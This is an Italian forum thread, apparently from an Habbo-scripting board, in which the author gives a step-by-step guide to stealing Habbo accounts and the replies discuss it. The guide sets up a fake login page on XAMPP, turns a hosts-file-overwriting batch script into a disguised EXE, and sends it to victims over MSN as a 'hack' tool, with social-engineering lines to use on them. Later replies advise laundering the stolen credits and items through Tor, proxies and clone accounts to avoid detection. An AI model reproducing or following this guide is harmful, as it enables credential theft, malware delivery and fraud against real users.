Release [Guida + BAT + EXE + Hosts + Fake Login] Scam

Alberto091

Utente Master
Autore del topic
20 Marzo 2008
2.087
0
Miglior risposta
0
Siccome ora bisogna essere più cattivi in questo forum, ora lo sarò pure io:

- 1) Qualsiasi mia guida non potrà più essere replicata e in nessun altro forum, non potrà essere spammata o cose varie, chi viene qua e la legge, beato lui, chi non la vede si arrangia. Il primo che si azzarda a ritoccarla per ripostarla è morto.
Questo equivale anche se la sezione habbo scripting verrà azzerata ancora.
Non accetto nemmeno che la postiate mettendo la fonte, salvo rarissime autorizzazioni (Idem per Bat+Hosts+Miglioramenti+modifiche+qualsiasi altro strumento all'intero, escluso Il server e il fake login e le icone).



2) Lo sciax2 Forum e io non siamo responsabili dell'uso che farete di questo Fake molto cattivo, è solo a scompo informativo..

3) Il primo che si azzarda ad aggiungermi in Windows Live messenger per chiedermi di risolvergli problemi, verrà cancellato e bloccato perennemente dalla mia lista

4) Non accetto commenti Off topic, spam, OT, flame.


Daniel001, APPRENDI

FONTE: Tutta mia a parte il Fake Login che è di SuperEdo95 e Habbos di gab.l e non come pensano tutti il nostro cristo daniel001

___________________________________________________________
[CC]Questa Opera è protetta da Copyrigh :emoji_smiley:[/CC]

CHE LA GUIDA ABBIA INIZIO

Requisiti:

- Avere Installato Winrar
- Avere almeno un blocco note
- Avere un po di Usta
- Calma e pazienza
- Un ip dinamico (ovvero non fisso per i n00b)

Cosa fa questo Fake?

Il fake è micidiale, sarà un po più lento, ma con questo si scamma davvero bene. Si ha la possibilità di guadagnare molti crediti e furni in un sol colpo

PRO e CONTRO?

Pro: Appunto, con questo fake, si può quasi scegliere la propria vittima da scammare, e quindi si può prendere più roba, la vittima non entrerà più in habbo, questo vorrà dire che potrete prendergli i furni e i crediti

Contro: La vittima dovrà avere Msn, se la vittima è nabba dovrete un attimo spiegargli come decomprimere il fake che gli invierete, se verrete bannati, bè verrete bannati per frode fino al 2020.

Prima di spiegarvi come installare il fake vi do un attimo di prove

Ieri per prova ho scammato una persona (tempo impiegato: 10 minuti) e questo è stato il risultato:

ajsb5z.jpg


Ma cos'è successo?? Non ho utilizzato un proxy e il giorno dopo è scattato il ban (proprio per questo ho fatto lo screenshot con un altro pers)

5mgw0k.jpg



Ma ora...arriviamo al dunque...ovvero con scammare l'habbettino.

a) Scarichiamo il Fake login da qua:
http://www.sciax2.it/forum/showthread.php?t=35638

Scompattiamo e mettiamolo su desktop

b)Scarichiamo Questo programma di nome Xampp! da qua:

Perfavore, Entra oppure Registrati per vedere i Link!


1) Installiamolo compreso di apache MySQL e Filezilla
2) Andiamo in C:\Xampp\htdocs e cancelliamo tutto il contenuto della cartella htdocs
3) prendiamo i files del nostro fake login e mettiamoli nella cartella htdocs
4) Entriamo nel pannello di controllo di xampp e premiamo su "Start" ad Apache, MySQL e Filezilla

2qdollc.jpg


(ve li dico tutti e 3 così non avete problemi) ora, per verificare che sia pubblico il fake login facciamo così:

Andiamo su google e scriviamo "MIO IP" andiamo nel primo link e guardiamo qual'è il nostro ip, una volta letto scriviamolo la nella barra dell indirizzo
Perfavore, Entra oppure Registrati per vedere i Link!


e premiamo invio, se la pagina che ci risulta è il fake login ovvero la home page finta di habbo, vuol dire che xampp sta lavorando al 100%

a334w7.jpg

Ora scaricate questo Bat da qua:

Perfavore, Entra oppure Registrati per vedere i Link!


Dategli il nome che volete, l'importante che sia in tema con habbo scripting, es: Habbo Hack 4.2 Beta Scripts


il comando che esegue questo bat è

copy "C:\Documents and Settings\%USERNAME%\Desktop\hosts" /Y "C:\WINDOWS\system32\drivers\etc"

dove COPY copia il file hosts che si trova nel nostro desktop,%USERNAME% perchè nno sapete qual'è il nome del pc della vittima /Y perchè non chieda la conferma di copiare il file e poi la cartella dove deve essere copiato, ovvero nella cartella etc del system32. Ma a breve capirete meglio perchè tutto questo.

Ora scarichiamo questo file hosts da qua
Perfavore, Entra oppure Registrati per vedere i Link!


apriamo codesto file con un blocco note, e andiamo a sostituire dove c'è scritto TUO-IP con il vostro IP attuale, premetto che ogni volta che il vostro IP cambia dovrete pure aggiornare il file.

Scarichiamo Bat_to_exe_converter da qua:
Perfavore, Entra oppure Registrati per vedere i Link!


Questo ci converte il bat in un exe... ma come procedere?

1) Apritelo, premete nei primi 3 punti e andate a scegliere dal desktop il bat che avete rinominato

2) nel secondo bottone con i 3 puntini andate a scegliere il file hosts sta aggiornato sul vostro desktop

3) nel terzo bottone con i 3 punti è opzionale, serve per dare un icona all'exe, così è più credibile, io vi consiglio di scaricare questa che l'ho tovata qua sparsa sul forum (ovviamente ci potrete mettere voi un qualsiasi icona che volete, basta che sia in formato .ico:

Perfavore, Entra oppure Registrati per vedere i Link!



okkk! perfetto abbiamo quasi finito, il risultato dovrebbe essere questo
2sacjk1.jpg

ora con winrar comprimete il l'exe e il file hosts.

1) Andate su habbo con Habbos 2.3 e mettetevi a scriptare da chi volete, di solito la vostra vittima, essa rimarrà sbalordita e vi chiederà, cm fai?? e voi gli dite...ho creato un programma io...c'ho lavorato su un bel po (xDDD scusa gab hiih) e gli dite... se vuoi te lo posso passare per msn.

Scarichiamo Habbos 2.3 Da qua:
http://www.sciax2.it/forum/showthread.php?t=35935
Fonte: Gab.l

2) Ora lo aggiungete su msn (ricordate di avere attivo dal pannello di controllo apache mySQL e Filezilla!)

3) Inviategli il vostro archivio compresso (se per caso per rendere più credibile il bat per appensatirlo basta che lo aprite col blocco note e scrivete dopo il comando per copiare il file questo comando @REM_parole_a_caso e lo incollate un bel po di volte, lo appesantisce di 1Byte ogni 8 parole credo.)

4) la vittima DEVE ASSOLUTAMENTE ESTRARRE IL FILE COMPRESO SUL DESKTOP se no non funziona!! basta che glielo dite voi, guarda che gli scripts funzionano solo se decomprimi il file sul desktop

5) ditele di chiudere tutti i browser e di di avviare il vostro fake exe. In 1 secondo comparirà una scheramat dos e poi se ne andrà. Ditegli che funziona tutto perfettamente e invitatela a riaprire habboe di andare in una vostra stanza a scriptare insieme ;)

6) cosa succede? quel bat è andato a sostituire il file hosts che c'era già sul computer con il vostro, in questo modo succede che quando la vittima proverà ad andare su
Perfavore, Entra oppure Registrati per vedere i Link!
verrà automaticamente indirizzata sul vostro fake, ma il bello è che una volta rindirizzata, la nella barra dell'indirizzo rimarrà sempre
Perfavore, Entra oppure Registrati per vedere i Link!


7) una volta che effettuerà l'accesso gli darà un errore, se vi dice che non riesce a entrare il fake ha lavorato cn successo! ora inventatevi una scusa e bloccatela da msn

8) per vedere la password e nome del suo personaggio bisogna andare qua---> C:\xampp\htdoc\Loading.html

Buon divertimento :emoji_smiley:

by alberto091

Hai Router O Hamachi??
Ecco La Guida Di : SteVo666
http://www.sciax2.it/forum/showthread.php?p=425725
 
Ultima modifica:
  • Like
Reactions: 1 person
allora se uso un proxy non mi bannano? huh

devi fare in modo che non ci sia mai un collegamento tra i 2 habbo...credo che devi fare così ---> entrare col proxy nel personaggio rubato---> metterli in un clone---> riattivare il proxy e cambiare identità se usi tor--->accendere un altro pc che ha IP diverso ed eseguire lo scambio sicuro tra il clone e il tuo vero habbo. Credo che cosi habbo non ti possa rintracciare mai più XD


ovvero IP-A (IP persionaggio rubato) IP-B (IP clone) IP-C (IP vero personaggio)

Entrare con tor nel personaggio rubato con IP-A
andare nella stanza del clone e posare i furni

accedere col clone che ha un IP-B

accendere un altro pc che ha IP-C

eseguire tra IP-B ed IP-C uno scambio sicuro.
 
Ultima modifica:
qnt clicco start su mysql dice mysql service not start... che devo fare? :S

tecnicamente la mySQL non dovrebbe servire, però per evitare problemi ho detto di attivarli tutti e 3...prvaad avere attivo apache almeno e quello e vedi se il fake login si pubblica.
 
ho attivo apache e filezilla, volevo chiederti 1 ultima cosa.. siccome me lo avevi fatto tu.. rciordo che il mio ip nn lo avevi visto da quel sito che dici tu sopra, volevo chiedere come avevi fatto a fare quella cosa pompat di comandi? xD scs del nome errato.. com'èra config_all? :S
 
wow,ora mi ci metto e tento di fare bene tutti i passaggi,speriamo bene xD
 
Alberto

Tu, Vicino a me apprendi? ù . ù voglio dirti che tu da me hai molto da imparare -.- solo l'eta che ci divide dovresti capirlo..

Il file bat viene bloccato dall'antivirus quei furni che si vedono nell'immagine possono anke essere tu un tuo amiko

Questo scam e pessimo : Per scammarlo dovete sempre mandargli un file alla vittima non ci casca piu nessuno -.-

poi senti a me non voglio fare polemike datti all'IPPICA che e meglio e troppo difficile habbo x te... Usate i fake fate prima e poi rikordate se truffate su msn non solo sapranno i vostri dati ma da oggi su puo risalire all'ip su msn e inoltre e una truffa illegalissima COME DICE LUI NON SI PRENDE RESPONSABILITà -.-
 
Ultima modifica:
Tu, Vicino a me apprendi? ù . ù voglio dirti che tu da me hai molto da imparare -.- solo l'eta che ci divide dovresti capirlo..

Il file bat viene bloccato dall'antivirus quei furni che si vedono nell'immagine possono anke essere tu un tuo amiko

Questo scam e pessimo : Per scammarlo dovete sempre mandargli un file alla vittima non ci casca piu nessuno -.-

poi senti a me non voglio fare polemike datti all'IPPICA che e meglio e troppo difficile habbo x te... Usate i fake fate prima e poi rikordate se truffate su msn non solo sapranno i vostri dati ma da oggi su puo risalire all'ip su msn e inoltre e una truffa illegalissima COME DICE LUI NON SI PRENDE RESPONSABILITà -.-


[ot]calma ragazzi[/ot]
 
GRAZIE TI AMO ALBERTO ADESSO FAKKO QUALCUNO BUAHAUA comunque a me il programma di Gab non funziona bene me lo spieghi come s iusa ? grazie :emoji_slight_smile:
 
se vuoi ti posso spiegare io rikku su msn xD
a me questo non funziona non mi manda nel fake quando vado su habbo